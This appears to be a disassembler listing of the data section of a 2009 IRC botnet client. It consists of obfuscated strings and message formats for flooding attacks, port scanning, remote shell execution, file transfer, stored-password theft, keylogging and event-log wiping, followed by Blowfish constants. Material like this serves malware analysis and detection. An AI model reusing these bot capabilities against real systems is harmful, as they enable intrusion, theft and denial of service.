; sub_40A938+DCA�o ...
align 4
aJqrlpUxr08Qqdu db 'JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znNna1b7t5k0pequ3.5yg/c/',0
; DATA XREF: sub_40A938+DEC�o
; sub_40A938+F7A�o ...
align 4
a4ezrg1ye5hp1au db '4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO6N/QGUB30',0
; DATA XREF: sub_40A938+EE8�o
; sub_40A938+F0E�o ...
align 4
a2ms3c_kjtek0 db '2MS3c.kJTeK0',0 ; DATA XREF: sub_40A938+1A71�o
; sub_4155B9+C53�o
align 4
aOgyzo1Qmpy1 db 'OGyZo1/qmpy1',0 ; DATA XREF: sub_40A938+1A6B�o
; sub_4155B9+C5E�o
align 4
aNI427pnt0 db 'n/i4//27pnT0',0 ; DATA XREF: sub_40A938+1A59�o
; sub_4155B9+C69�o
align 4
aXg4wo0gh6fy0p9 db 'xg4wO0Gh6FY0p9CIj.BYYVY.',0 ; DATA XREF: sub_40A938+1A53�o
; sub_4155B9+C77�o
align 4
aTarxm0mtxpp_ db 'tArXm0mtxpp.',0 ; DATA XREF: sub_406D50+D1�o
; sub_407252+63�o ...
align 4
aQ3bef_grjcn1aa db 'Q3BEf.grJCN1aA/Td0EX07M1',0 ; DATA XREF: sub_40A938+19D3�o
; sub_40A938:loc_40C359�o ...
align 4
aPJs70eukyp0 db 'P/JS70EukYp0',0 ; DATA XREF: sub_40A938:loc_40C342�o
; sub_4155B9+C98�o
align 4
aUDneTzo8s_omqd db 'u/DnE/tzo8s.OMQDW1DERIa/',0 ; DATA XREF: sub_40A938+1B93�o
; sub_4155B9+CA3�o
align 10h
a2n67h0pevch1 db '2n67H0PEVch1',0 ; DATA XREF: sub_4155B9+CAE�o
align 10h
a5v1zc1efrzg_tc db '5v1zc1EfRZg.tccap0cH5OH0NHckR.k9Wj.1',0 ; DATA XREF: sub_40A938+426�o
; sub_4155B9+CB9�o
align 4
a6f3al1m_ydx05y db '6f3aL1m.YdX05ythl/YiVnR/jSlje0VWu/50pequ3.5yg/c/',0
; DATA XREF: sub_40A938+B2B�o
; sub_4155B9+CC4�o
align 4
a3un9w_temux_5y db '3Un9W.TEMuX.5ythl/YiVnR/J9IiO.VPA7i1',0 ; DATA XREF: sub_4155B9+CD2�o
; sub_4181F4+662�o
align 4
aNeuf6qyoiMdAn1 db 'NEuF//6QYOi/Md/AN15kOfy.nR01m1pzFKu1',0 ; DATA XREF: sub_40A938+1BD6�o
; sub_4155B9+CE8�o
align 4
a7nmru1owjrg0md db '7NmRu1oWjRG0Md/AN15kOfy.nR01m1pzFKu1',0 ; DATA XREF: sub_4155B9+CDD�o
align 4
aNxruj_viib6 db 'nxruJ.vIib6/',0 ; DATA XREF: sub_4155B9+CF3�o
; sub_418EDB:loc_418F0D�o
align 4
a5gcpxGycn21n1z db '5GCpx/gYCn21N1Zsj.w3Ty30',0 ; DATA XREF: sub_4155B9+CFE�o
; sub_418EDB+1AC�o
align 10h
aFoabg1acvfoOsd db 'fOaBg1ACVfo/osdpb1E0v95.',0 ; DATA XREF: sub_40A938+711�o
; sub_40A938+1516�o ...
align 4
aPimgt12pvee_ db 'pImgT12pvEE.',0 ; DATA XREF: sub_40A938+28FA�o
; sub_4155B9+D14�o
align 4
aJgyqn0dmzir12z db 'jgYqN0dmziR12zQe40gFoLm.rilJR.uuL/I0',0
; DATA XREF: sub_40A938:loc_40D26A�o
; sub_4155B9+D1F�o
align 4
aAqejv_njvii_y8 db 'aQeJV.nJvIi.y8Ri./b5L.q.',0 ; DATA XREF: sub_4155B9+D2D�o
; sub_418EDB:loc_419052�o
align 10h
aSSSS db '%s %s (%s) %s',0 ; DATA XREF: sub_40A938+9F54�o
; sub_40A938+9F85�o
align 10h
aBuiltSep420092 db ' Built: Sep 4 2009 21:52:38',0 ; DATA XREF: sub_40A938+9F38�o
; sub_40A938+9F69�o
align 10h
aUnsecure db 'Unsecure',0 ; DATA XREF: sub_40A938+9E4A�o
; sub_421783+265�o ...
align 4
aSecure db 'Secure',0 ; DATA XREF: sub_40A938+9E43�o
; sub_421783+295�o
align 4
aSNoSubnetCla_0 db '%s No subnet class specified',0 ; DATA XREF: sub_40A938:loc_41464B�o
align 8
aSSSSDWithADe_0 db '%s %s %s %s:%d with a delay of %d seconds for %d minutes using %d'
; DATA XREF: sub_40A938+9B94�o
; sub_40A938+9C9B�o ...
db ' threads',0
align 4
aSPortInvalid_ db '%s Port invalid.',0 ; DATA XREF: sub_40A938+98B9�o
align 4
aSInvalidPort_ db '%s Invalid port.',0 ; DATA XREF: sub_40A938+9897�o
align 4
aSSDForDSecs__0 db '%s --> (%s:%d) for %d secs.',0 ; DATA XREF: sub_40A938+93BF�o
aSNoDelay_ db '%s No delay.',0 ; DATA XREF: sub_40A938:loc_413CB1�o
align 4
aSShouldRunS_ db '%s Should run: "%s".',0 ; DATA XREF: sub_40A938+91EC�o
align 10h
aSFailedToParse db '%s Failed to parse command.',0 ; DATA XREF: sub_40A938+9141�o
; sub_40A938+9258�o
a7: ; DATA XREF: sub_40A938+8D77�o
; sub_40A938+8EE5�o ...
unicode 0, <7>,0
aVista db 'vista',0 ; DATA XREF: sub_40A938+8D4E�o
; sub_40A938+8ECE�o
align 4
a2k3 db '2k3',0 ; DATA XREF: sub_40A938+8D2A�o
; sub_40A938+8EA7�o
a2k_0 db '2k',0 ; DATA XREF: sub_40A938+8CEF�o
; sub_40A938+8E59�o
align 10h
aMe db 'me',0 ; DATA XREF: sub_40A938+8CC8�o
; sub_40A938+8E32�o
align 4
a98 db '98',0 ; DATA XREF: sub_40A938+8CA1�o
; sub_40A938+8E0B�o ...
align 4
aNt db 'nt',0 ; DATA XREF: sub_40A938+8C6E�o
; sub_40A938+8DD8�o
align 4
a95 db '95',0 ; DATA XREF: sub_40A938+8C3B�o
; sub_40A938+8DA5�o ...
align 10h
aSTryingToGetEx db '%s Trying to get external IP.',0 ; DATA XREF: sub_40A938+8849�o
; sub_40A938+8867�o
align 10h
a?: ; DATA XREF: sub_40A938+8669�o
; sub_40A938+86D5�o ...
unicode 0, <?>,0
align 8
aSSHttp1_1Refer db '%s %s HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_40A938+84C1�o
db 'Referer: %s',0Dh,0Ah
db 'User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; .N'
db 'ET CLR 1.1.4322)',0Dh,0Ah
db 'Host: %s',0Dh,0Ah
db 'Connection: Keep-Alive',0Dh,0Ah
db 0Dh,0Ah,0
align 10h
aSSiteFailedToO db '%s Site failed to open.',0 ; DATA XREF: sub_40A938+8345�o
; sub_40A938+8362�o
aSSiteOpened_ db '%s Site opened.',0 ; DATA XREF: sub_40A938+8300�o
aIexplore db 'iexplore',0 ; DATA XREF: sub_40A938+82E2�o
align 4
aSS__0 db '%s --> (%s).',0 ; DATA XREF: sub_40A938+81FA�o
; sub_40A938+8217�o ...
align 4
aSSDDPackets_ db '%s --> (%s:%d) %d packets.',0 ; DATA XREF: sub_40A938+8016�o
; sub_40A938+8047�o ...
align 10h
aSSDWithDPacks db '%s --> (%s:%d) with %d packs',0 ; DATA XREF: sub_40A938+7C31�o
; sub_40A938+7DAE�o
align 10h
aSSDWithDConnSF db '%s --> (%s:%d) with %d conn',27h,'s for %d sec',27h,'s',0
; DATA XREF: sub_40A938+7AB1�o
align 4
aSSForDSecS db '%s --> (%s) for %d sec',27h,'s',0 ; DATA XREF: sub_40A938+790B�o
align 4
aSSDForDSecS db '%s --> (%s:%d) for %d sec',27h,'s',0 ; DATA XREF: sub_40A938+78B0�o
; sub_40A938+78E1�o
aSSD_1 db '%s --> (%s:%d)',0 ; DATA XREF: sub_40A938+7676�o
; sub_40A938+769C�o ...
align 4
aSSForDSecs_ db '%s --> (%s) for (%d secs).',0 ; DATA XREF: sub_40A938+7495�o
; sub_40A938+74BB�o ...
align 10h
aSSForDSecsWith db '%s --> (%s) for %d secs with %d ms delay.',0
; DATA XREF: sub_40A938+6D20�o
; sub_40A938+6D51�o ...
align 4
aSSDForDSecs_ db '%s --> (%s:%d) for (%d secs).',0 ; DATA XREF: sub_40A938+6A70�o
; sub_40A938+6F53�o ...
align 4
aSPortPscanStar db '%s Port pscan started: %s:%d with delay: %d(ms).',0
; DATA XREF: sub_40A938+65BD�o
align 10h
aSSSSDWithADela db '%s %s %s %s:%d with a delay of %d seconds for %d minutes using %d'
; DATA XREF: sub_40A938+62AB�o
db ' threads.',0
align 4
aSequential db 'Sequential',0 ; DATA XREF: sub_40A938+629A�o
; sub_40A938+6390�o ...
align 4
aRandom db 'Random',0 ; DATA XREF: sub_40A938+6293�o
; sub_40A938+6389�o ...
align 10h
aSNoSubnetClass db '%s No subnet class specified.',0 ; DATA XREF: sub_40A938+6157�o
align 10h
aSNoIpSpecified db '%s No IP specified.',0 ; DATA XREF: sub_40A938+6089�o
; sub_40A938:loc_414644�o
aD_x_x_x db '%d.x.x.x',0 ; DATA XREF: sub_40A938+6004�o
; sub_40A938+990E�o
align 10h
aX_x_x_x db 'x.x.x.x',0 ; DATA XREF: sub_40A938+5FD6�o
; sub_40A938+98DC�o
aSInvalidPort db '%s Invalid port',0 ; DATA XREF: sub_40A938+5F9C�o
aSIsOn_ db '%s is on.',0 ; DATA XREF: sub_40A938+5CE9�o
align 4
aSIsOff_ db '%s is off.',0 ; DATA XREF: sub_40A938+5CA2�o
; sub_40A938+5D1D�o ...
align 10h
aSIsSetToSDUSPS db '%s is set to %s:%d U: %s P: %s F: %s',0 ; DATA XREF: sub_40A938+5BC4�o
; sub_40A938+5C30�o
align 4
aSSDDDDD_exe db '%s%s%d%d%d%d%d.exe',0 ; DATA XREF: sub_40A938+5884�o
align 4
aSSS_ db '%s %s %s.',0 ; DATA XREF: sub_40A938+568C�o
; sub_40A938+574D�o ...
align 4
aSConnectionClo db '%s Connection closed: (%i/%ikB sent).',0 ; DATA XREF: sub_40A938+5563�o
align 10h
aSTimedOutClosi db '%s Timed Out, closing connection.',0 ; DATA XREF: sub_40A938+5462�o
align 4
aSDDI db '%s %d %d %i',0 ; DATA XREF: sub_40A938+5408�o
aDccSendSS db 'DCC Send %s (%s)',0 ; DATA XREF: sub_40A938+53CF�o
align 4
aSendingYouS db 'Sending you %s',0 ; DATA XREF: sub_40A938+53AF�o
align 4
aSBindSD db '%s Bind %s <%d>',0 ; DATA XREF: sub_40A938+5349�o
aSSD db '%s %s <%d>',0 ; DATA XREF: sub_40A938+52C7�o
; sub_40A938+841D�o ...
align 10h
aSNoFile db '%s No file',0 ; DATA XREF: sub_40A938+5284�o
align 4
aSFailedToOpenS db '%s Failed to open: "%s",error: <%d>',0 ; DATA XREF: sub_40A938+5154�o
; sub_40A938+517C�o
aSOpenedS_ db '%s Opened: "%s".',0 ; DATA XREF: sub_40A938+50FA�o
align 4
aOpen db 'open',0 ; DATA XREF: sub_40A938+50E5�o
; sub_40A938+82E7�o ...
align 4
aSFailedToSetAt db '%s Failed to set Attributes to: "%s",error: <%d>',0
; DATA XREF: sub_40A938+5097�o
; sub_40A938+50BF�o
align 10h
aSAttributesSet db '%s Attributes Set to: "%s".',0 ; DATA XREF: sub_40A938+5070�o
aSFailedToCopyS db '%s Failed to copy: "%s" to "%s",error: <%d>',0
; DATA XREF: sub_40A938+4FE5�o
; sub_40A938+5014�o
aSCopiedSToS db '%s Copied: "%s" to "%s"',0 ; DATA XREF: sub_40A938+4F79�o
aSFailedToMoveS db '%s Failed to move: "%s" to: "%s", error: <%d>',0
; DATA XREF: sub_40A938+4E4D�o
; sub_40A938+4E7C�o
align 10h
aSMovedSToS db '%s Moved: "%s" to: "%s"',0 ; DATA XREF: sub_40A938+4DE9�o
aSSDoesnTExist_ db '%s %s doesn',27h,'t exist.',0 ; DATA XREF: sub_40A938:loc_40F63F�o
align 10h
aSSIsNotAFolder db '%s %s is not a folder.',0 ; DATA XREF: sub_40A938:loc_40F638�o
align 4
aSFailedToDelet db '%s Failed to delete folder: %s',0 ; DATA XREF: sub_40A938:loc_40F62E�o
align 4
aSFolderDeleted db '%s Folder deleted: %s',0 ; DATA XREF: sub_40A938+4CEC�o
align 10h
aSFailedToDelFi db '%s Failed to del file: %s, error: <%d>',0 ; DATA XREF: sub_40A938+4C67�o
; sub_40A938+4C8F�o
align 4
aSFileDeletedS db '%s File deleted: %s',0 ; DATA XREF: sub_40A938+4C40�o
aSFileDoesnTExi db '%s File doesn',27h,'t exist: %s',0 ; DATA XREF: sub_40A938+4C12�o
align 4
aSFileExistsS db '%s File exists: %s',0 ; DATA XREF: sub_40A938+4C03�o
align 4
aSFailedToReadF db '%s Failed to read file: %s,error: <%d>',0 ; DATA XREF: sub_40A938+4BA6�o
; sub_40A938+4BCE�o
align 4
aSFileDisplayed db '%s File displayed: %s',0 ; DATA XREF: sub_40A938+4B50�o
align 4
aSDisplayingFil db '%s Displaying file: %s',0 ; DATA XREF: sub_40A938+4AA1�o
align 4
aSCommandsS_ db '%s Commands: %s.',0 ; DATA XREF: sub_40A938+4937�o
align 4
asc_440D78: ; DATA XREF: sub_40A938+48D1�o
; sub_40A938+857F�o ...
dw 0Ah
unicode 0, <>,0
aSShellReady_ db '%s Shell ready.',0 ; DATA XREF: sub_40A938+47C8�o
; sub_40A938+47E6�o
aSCouldnTOpenSh db '%s Couldn',27h,'t open shell.',0 ; DATA XREF: sub_40A938+4786�o
aSSystemcallSen db '%s SystemCall sent: "%s"',0 ; DATA XREF: sub_40A938+46F9�o
align 10h
aSSystemcallFai db '%s SystemCall failed.',0 ; DATA XREF: sub_40A938+46E0�o
align 4
aSUnloaded_ db '%s Unloaded.',0 ; DATA XREF: sub_40A938+4627�o
align 4
aSNickservDrop db '%s nickserv drop',0 ; DATA XREF: sub_40A938+45F4�o
align 4
aSNickservRegis db '%s nickserv :register pass103 %s',0 ; DATA XREF: sub_40A938+45C1�o
align 10h
aS@S_com db '%s@%s.com',0 ; DATA XREF: sub_40A938+45A4�o
align 4
aSMemoservSendS db '%s memoserv :send %s %s',0 ; DATA XREF: sub_40A938+455D�o
dword_440E44 dd 25207325h, 13A2073h, 20434344h, 444E4553h, 73252220h
; DATA XREF: sub_40A938+3E0D�o
; sub_40A938+3F02�o
dd 31322022h, 30373033h, 33333436h, 1642520h, 0
dword_440E6C dd 206325h aSSDccSendCS db '%s %s :DCC SEND C:\\\\%s',0 ; DATA XREF: sub_40A938+3CDB�o
align 4
dword_440E8C dd 25207325h, 23A2073h, 25323103h, 73250373h, 25323103h
; DATA XREF: sub_40A938+3CBB�o
dd 20373h
dword_440EA4 dd 25207325h, 13A2073h, 20434344h, 444E4553h, 20732520h
; DATA XREF: sub_40A938+3C8C�o
dd 30333132h, 34363037h, 25203333h, 164h
dword_440EC8 dd 25207325h, 13A2073h, 20434344h, 444E4553h, 2E642520h
; DATA XREF: sub_40A938+3C5C�o
dd 20657865h, 63657845h, 6E697475h, 69662067h, 2520656Ch
dd 164h, 0
dword_440EF8 dd 25207325h, 13A2073h, 20434344h, 444E4553h, 2E642520h
; DATA XREF: sub_40A938+3C22�o
dd 20747874h, 6E65704Fh, 25206465h, 202C2064h, 64616572h
dd 2C676E69h, 706D6F63h, 6574656Ch, 202D2064h, 6F6C7075h
dd 63206461h, 6C706D6Fh, 21657465h, 1
dword_440F44 dd 25207325h, 13A2073h, 20434344h, 444E4553h, 576F5720h
; DATA XREF: sub_40A938+3BE8�o
dd 5F736569h, 69576F57h, 575F7365h, 6569576Fh, 31322073h
dd 30373033h, 33333436h, 1642520h, 2 dup(0)
dword_440F80 dd 64250302h, 5964252Ch, 2C642503h, 34F6425h, 252C6425h
; DATA XREF: sub_40A938+3BB9�o
dd 3A05564h, 252C6425h, 25034864h, 64252C64h, 64250341h
dd 5664252Ch, 2C642503h, 0A0456425h, 2C642503h, 3426425h
dd 252C6425h, 25034564h, 64252C64h, 64250345h, 4E64252Ch
dd 642503A0h, 5064252Ch, 2C642503h, 3556425h, 252C6425h
dd 3A05464h, 252C6425h, 25034964h, 64252C64h, 2503A04Eh
dd 64252C64h, 64250354h, 4864252Ch, 2C642503h, 0A0456425h
dd 2C642503h, 63256425h, 2C642503h, 3576425h, 252C6425h
dd 2034E64h, 0
dword_441028 dd 69257325h, 0 dword_441030 dd 434F4E4Bh, 7325204Bh, 73253A20h, 0dword_441040 dd 25207325h, 73252073h, 0 ; sub_40A938+36D3�o ...
dword_44104C dd 25207325h, 13A2073h, 474E4946h, 15245h ; sub_40A938+342F�o ...
dword_44105C dd 25207325h, 13A2073h, 53524556h, 14E4F49h, 0 ; sub_40A938+4308�o
dword_441070 dd 25207325h, 13A2073h, 474E4950h, 1 ; sub_40A938+333F�o ...
dword_441080 dd 25207325h, 13A2073h, 17325hdword_44108C dd 64250302h, 2064252Ch, 3026325h, 0dword_44109C dd 64250302h, 2564252Ch, 3022063h, 2 dup(0)unk_4410B0 db 3Fh ; ? ; DATA XREF: sub_40A938+2F07�o
db 1, 44h, 43h
aCSendFf???f?11 db 'C SEND "ff???f?𝑹𝑰𝑷𝑳𝑶w'
db '923;𝑺𝑼𝑷𝑮𝑼𝒀⻙'
db '0;" 0 0 0',0
dword_441140 dd 64250302h, 3F64252Ch, 43434401h, 4E455320h, 66222044h
; DATA XREF: sub_40A938+2EF6�o
dd 3F3F3F66h, 20223F66h, 20302030h, 20330h, 0
dword_441168 dd 64250302h, 5964252Ch, 2C642503h, 34F6425h, 252C6425h
; DATA XREF: sub_40A938+2EC9�o
dd 3A05564h, 252C6425h, 25034864h, 64252C64h, 64250341h
dd 5664252Ch, 2C642503h, 0A0456425h, 2C642503h, 3426425h
dd 252C6425h, 25034564h, 64252C64h, 64250345h, 4E64252Ch
dd 642503A0h, 5064252Ch, 2C642503h, 3556425h, 252C6425h
dd 3A05464h, 252C6425h, 25034964h, 64252C64h, 2503A04Eh
dd 64252C64h, 64250354h, 4864252Ch, 2C642503h, 0A0456425h
dd 2C642503h, 63256425h, 2C642503h, 3576425h, 252C6425h
dd 73204E64h, 74726174h, 79656B20h, 67676F6Ch, 2037265h
dd 0
aAbcdefghijklmn db 'abcdefghijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz',0
; DATA XREF: sub_40A938+2CBA�o
; sub_40A938+3D5C�o ...
align 10h
aSSS db '%s %s :%s',0 ; DATA XREF: sub_40A938+2C7E�o
; sub_40A938+2F28�o ...
align 4
aSLoadedOntoSDA db '%s Loaded Onto: (%s:%d), Amount: (%d)',0 ; DATA XREF: sub_40A938+2AD8�o
; sub_40A938+2B0D�o
align 4
aSTooMuchConns_ db '%s Too Much conns.',0 ; DATA XREF: sub_40A938+2A77�o
align 4
aSObtainingExte db '%s Obtaining external IP',0 ; DATA XREF: sub_40A938+299F�o
align 4
aSSSS_ db '%s %s: %s -> %s.',0 ; DATA XREF: sub_40A938+2904�o
align 4
aSFailedToLoadD db '%s Failed to load dnsapi.dll.',0 ; DATA XREF: sub_40A938:loc_40D1AF�o
align 4
aSFailedToFlu_0 db '%s Failed to flush DNS cache.',0 ; DATA XREF: sub_40A938:loc_40D1A5�o
align 4
aSDnsCacheFlush db '%s DNS cache flushed.',0 ; DATA XREF: sub_40A938+2863�o
align 10h
aSFailedToFlush db '%s Failed to flush ARP.',0 ; DATA XREF: sub_40A938+2838�o
aSArpFlushed_ db '%s ARP flushed.',0 ; DATA XREF: sub_40A938+282D�o
aSClientNotOp_0 db '%s Client not open or found: "%s"',0 ; DATA XREF: sub_40A938:loc_40D12D�o
align 4
aSCommandSentS db '%s Command sent: "%s"',0 ; DATA XREF: sub_40A938+27EE�o
align 4
aSClientNotOpen db '%s Client not open.',0 ; DATA XREF: sub_40A938+274E�o
; sub_40A938+2770�o
aSUserIsRunning db '%s User is running mIRC v %s, Connected to %s (%s:%s) Nick: %s, O'
; DATA XREF: sub_40A938+2708�o
db 'n chans: (%s).',0
asc_4413F8 db ', ',0 ; DATA XREF: sub_40A938+2691�o
align 4
aChanI db '$chan(%i)',0 ; DATA XREF: sub_40A938+264B�o
align 4
aChan0 db '$chan(0)',0 ; DATA XREF: sub_40A938+2602�o
align 4
aPort_0 db '$port',0 ; DATA XREF: sub_40A938+25C2�o
align 4
aServerip db '$serverip',0 ; DATA XREF: sub_40A938+2585�o
align 4
aServer_0 db '$server',0 ; DATA XREF: sub_40A938+2542�o
aVersion db '$version',0 ; DATA XREF: sub_40A938+24B6�o
align 4
aMirc db 'mIRC',0 ; DATA XREF: sub_40A938+2466�o
; sub_41D94F+3C�o ...
align 4
aSSentIrcRawS_ db '%s Sent IRC raw: "%s".',0 ; DATA XREF: sub_40A938+2411�o
align 4
aSSOnSIThreadNu db '%s %s on %s: %i, thread number: %i.',0 ; DATA XREF: sub_40A938+22C6�o
; sub_40A938+22F6�o
aSSOnSISS_ db '%s %s on %s: %i, %s: %s.',0 ; DATA XREF: sub_40A938+223A�o
align 4
aSCreateProcess db '%s Create process thread.',0 ; DATA XREF: sub_40A938+20E5�o
align 4
aSProcs db '%s Procs',0 ; DATA XREF: sub_40A938+1FB3�o
align 4
aSBkillS db '%s BKill %s',0 ; DATA XREF: sub_40A938+1D91�o
aSBkillThread_ db '%s BKill thread.',0 ; DATA XREF: sub_40A938+1D78�o
align 4
aS2maintenance_ db '%s /2Maintenance./2',0 ; DATA XREF: sub_40A938+1C45�o
aRecord db ', (Record)',0 ; DATA XREF: sub_40A938:loc_40C452�o
align 4
aRecordUptimeS_ db ', Record UpTime: (%s).',0 ; DATA XREF: sub_40A938+1AFB�o
align 4
aSUptimeS_ db '%s UpTime: (%s).',0 ; DATA XREF: sub_40A938+1AD1�o
align 10h
aSSSSSSSSSS db '%s %s %s, %s %s (%s), %s (%s), %s (%s)',0 ; DATA XREF: sub_40A938+1A7B�o
align 4
aSAndS db '%s and %s',0 ; DATA XREF: sub_40A938+1A2B�o
align 4
aSSOnSI_0 db '%s %s on: (%s:%i)',0 ; DATA XREF: sub_40A938+1855�o
; sub_40A938+187F�o
align 4
aSSOnSI db '%s %s on: [%s:%i]',0 ; DATA XREF: sub_40A938+17A1�o
align 4
aSPstore db '%s PStore',0 ; DATA XREF: sub_40A938+1174�o
; sub_40A938+1242�o
align 4
aSStarted_ db '%s started.',0 ; DATA XREF: sub_40A938+1039�o
aSThreadList db '%s Thread list',0 ; DATA XREF: sub_40A938+E88�o
align 4
aSSD_ db '%s %s (%d).',0 ; DATA XREF: sub_40A938+DF1�o
; sub_40A938+ED8�o ...
aSSS_0 db '%s %s (%s)',0 ; DATA XREF: sub_40A938+D4F�o
; sub_40A938+1B8E�o ...
align 4
aSDS db '%s %d %s',0 ; DATA XREF: sub_40A938+CCA�o
align 4
aSAdvapi_dllNot db '%s Advapi.dll not loaded',0 ; DATA XREF: sub_40A938:loc_40B570�o
; sub_42377D+69�o
align 4
aSFailedToClear db '%s Failed to clear syslogs',0 ; DATA XREF: sub_40A938+C2E�o
align 10h
aSClearedDDSysl db '%s Cleared [%d/%d] syslogs',0 ; DATA XREF: sub_40A938+C1A�o
align 4
aSystem db 'system',0 ; DATA XREF: sub_40A938+BB9�o
; sub_41EB23+26�o
align 4
aApplication db 'application',0 ; DATA XREF: sub_40A938+BAB�o
; sub_41EB23+E�o
aSSS@S db '%s [%s!%s@%s]',0 ; DATA XREF: sub_40A938+B30�o
align 10h
aSS_ db '%s %s.',0 ; DATA XREF: sub_40A938+AA8�o
; sub_40A938+FD5�o ...
align 4
aUnsecured db 'Unsecured',0 ; DATA XREF: sub_40A938+A9E�o
align 4
aSSI db '%s %s (%i)',0 ; DATA XREF: sub_40A938+923�o
; sub_40A938+963�o
align 10h
aSSIS db '%s %s (%i) %s',0 ; DATA XREF: sub_40A938+8EE�o
; sub_40A938+915�o
align 10h
a6 db '$6',0 ; DATA XREF: sub_40A938+84E�o
align 4
a5 db '$5',0 ; DATA XREF: sub_40A938+83A�o
align 4
a4_0 db '$4',0 ; DATA XREF: sub_40A938+823�o
align 4
a3 db '$3',0 ; DATA XREF: sub_40A938+80F�o
align 10h
a2 db '$2',0 ; DATA XREF: sub_40A938+7FB�o
align 4
a1_0 db '$1',0 ; DATA XREF: sub_40A938+7E7�o
align 4
aChan db '$chan',0 ; DATA XREF: sub_40A938+7D3�o
align 10h
aUser_0 db '$user',0 ; DATA XREF: sub_40A938+7BD�o
align 4
off_4416A8 dd offset dword_656D24 ; DATA XREF: sub_40A938+7A0�o
; sub_40A938+24FF�o
dword_4416AC dd 73256325h, 0 aSAddedAliasS db '%s Added Alias: %s',0 ; DATA XREF: sub_40A938+6C7�o
align 4
aS_1 db ' %s',0 ; DATA XREF: sub_40A938+67E�o
; sub_40A938+14BA�o ...
aD_SS db '%d. %s = %s',0 ; DATA XREF: sub_40A938+5D1�o
aSAliasList db '%s [Alias list]',0 ; DATA XREF: sub_40A938+57C�o
aSServerListCom db '%s Server List complete.',0 ; DATA XREF: sub_40A938+54B�o
align 4
aISDSS db '%i: %s:%d%s, %s',0 ; DATA XREF: sub_40A938+524�o
aListComplete db '-=[List Complete]=-',0 ; DATA XREF: sub_40A938+4E2�o
aSServerISDS db '%s: Server: [%i: %s:%d%s]',0 ; DATA XREF: sub_40A938+4BA�o
align 4
aSsl db ' (SSL)',0 ; DATA XREF: sub_40A938+489�o
; sub_40A938+508�o
align 4
aIexplore_exe db 'iexplore.exe',0 ; DATA XREF: sub_40A938+3C9�o
; sub_40A938+837A�o ...
align 10h
dword_441760 dd 243F6A88h dd 85A308D3h, 13198A2Eh, 3707344h, 0A4093822h, 299F31D0h
dd 82EFA98h, 0EC4E6C89h, 452821E6h, 38D01377h, 0BE5466CFh
dd 34E90C6Ch, 0C0AC29B7h, 0C97C50DDh, 3F84D5B5h, 0B5470917h
dd 9216D5D9h, 8979FB1Bh
dword_4417A8 dd 0D1310BA6h dd 98DFB5ACh, 2FFD72DBh, 0D01ADFB7h, 0B8E1AFEDh, 6A267E96h
dd 0BA7C9045h, 0F12C7F99h, 24A19947h, 0B3916CF7h, 801F2E2h
dd 858EFC16h, 636920D8h, 71574E69h, 0A458FEA3h, 0F4933D7Eh
dd 0D95748Fh, 728EB658h, 718BCD58h, 82154AEEh, 7B54A41Dh
dd 0C25A59B5h, 9C30D539h, 2AF26013h, 0C5D1B023h, 286085F0h
dd 0CA417918h, 0B8DB38EFh, 8E79DCB0h, 603A180Eh, 6C9E0E8Bh
dd 0B01E8A3Eh, 0D71577C1h, 0BD314B27h, 78AF2FDAh, 55605C60h
dd 0E65525F3h, 0AA55AB94h, 57489862h, 63E81440h, 55CA396Ah
dd 2AAB10B6h, 0B4CC5C34h, 1141E8CEh, 0A15486AFh, 7C72E993h
dd 0B3EE1411h, 636FBC2Ah, 2BA9C55Dh, 741831F6h, 0CE5C3E16h
dd 9B87931Eh, 0AFD6BA33h, 6C24CF5Ch, 7A325381h, 28958677h
dd 3B8F4898h, 6B4BB9AFh, 0C4BFE81Bh, 66282193h, 61D809CCh
dd 0FB21A991h, 487CAC60h, 5DEC8032h, 0EF845D5Dh, 0E98575B1h
dd 0DC262302h, 0EB651B88h, 23893E81h, 0D396ACC5h, 0F6D6FF3h
dd 83F44239h, 2E0B4482h, 0A4842004h, 69C8F04Ah, 9E1F9B5Eh
dd 21C66842h, 0F6E96C9Ah, 670C9C61h, 0ABD388F0h, 6A51A0D2h
dd 0D8542F68h, 960FA728h, 0AB5133A3h, 6EEF0B6Ch, 137A3BE4h
dd 0BA3BF050h, 7EFB2A98h, 0A1F1651Dh, 39AF0176h, 66CA593Eh
dd 82430E88h, 8CEE8619h, 456F9FB4h, 7D84A5C3h, 3B8B5EBEh
dd 0E06F75D8h, 85C12073h, 401A449Fh, 56C16AA6h, 4ED3AA62h
dd 363F7706h, 1BFEDF72h, 429B023Dh, 37D0D724h, 0D00A1248h
dd 0DB0FEAD3h, 49F1C09Bh, 75372C9h, 80991B7Bh, 25D479D8h
dd 0F6E8DEF7h, 0E3FE501Ah, 0B6794C3Bh, 976CE0BDh, 4C006BAh
dd 0C1A94FB6h, 409F60C4h, 5E5C9EC2h, 196A2463h, 68FB6FAFh
dd 3E6C53B5h, 1339B2EBh, 3B52EC6Fh, 6DFC511Fh, 9B30952Ch
dd 0CC814544h, 0AF5EBD09h, 0BEE3D004h, 0DE334AFDh, 660F2807h
dd 192E4BB3h, 0C0CBA857h, 45C8740Fh, 0D20B5F39h, 0B9D3FBDBh
dd 5579C0BDh, 1A60320Ah, 0D6A100C6h, 402C7279h, 679F25FEh
dd 0FB1FA3CCh, 8EA5E9F8h, 0DB3222F8h, 3C7516DFh, 0FD616B15h
dd 2F501EC8h, 0AD0552ABh, 323DB5FAh, 0FD238760h, 53317B48h
dd 3E00DF82h, 9E5C57BBh, 0CA6F8CA0h, 1A87562Eh, 0DF1769DBh
dd 0D542A8F6h, 287EFFC3h, 0AC6732C6h, 8C4F5573h, 695B27B0h
dd 0BBCA58C8h, 0E1FFA35Dh, 0B8F011A0h, 10FA3D98h, 0FD2183B8h
dd 4AFCB56Ch, 2DD1D35Bh, 9A53E479h, 0B6F84565h, 0D28E49BCh
dd 4BFB9790h, 0E1DDF2DAh, 0A4CB7E33h, 62FB1341h, 0CEE4C6E8h
dd 0EF20CADAh, 36774C01h, 0D07E9EFEh, 2BF11FB4h, 95DBDA4Dh
dd 0AE909198h, 0EAAD8E71h, 6B93D5A0h, 0D08ED1D0h, 0AFC725E0h
dd 8E3C5B2Fh, 8E7594B7h, 8FF6E2FBh, 0F2122B64h, 8888B812h
dd 900DF01Ch, 4FAD5EA0h, 688FC31Ch, 0D1CFF191h, 0B3A8C1ADh
dd 2F2F2218h, 0BE0E1777h, 0EA752DFEh, 8B021FA1h, 0E5A0CC0Fh
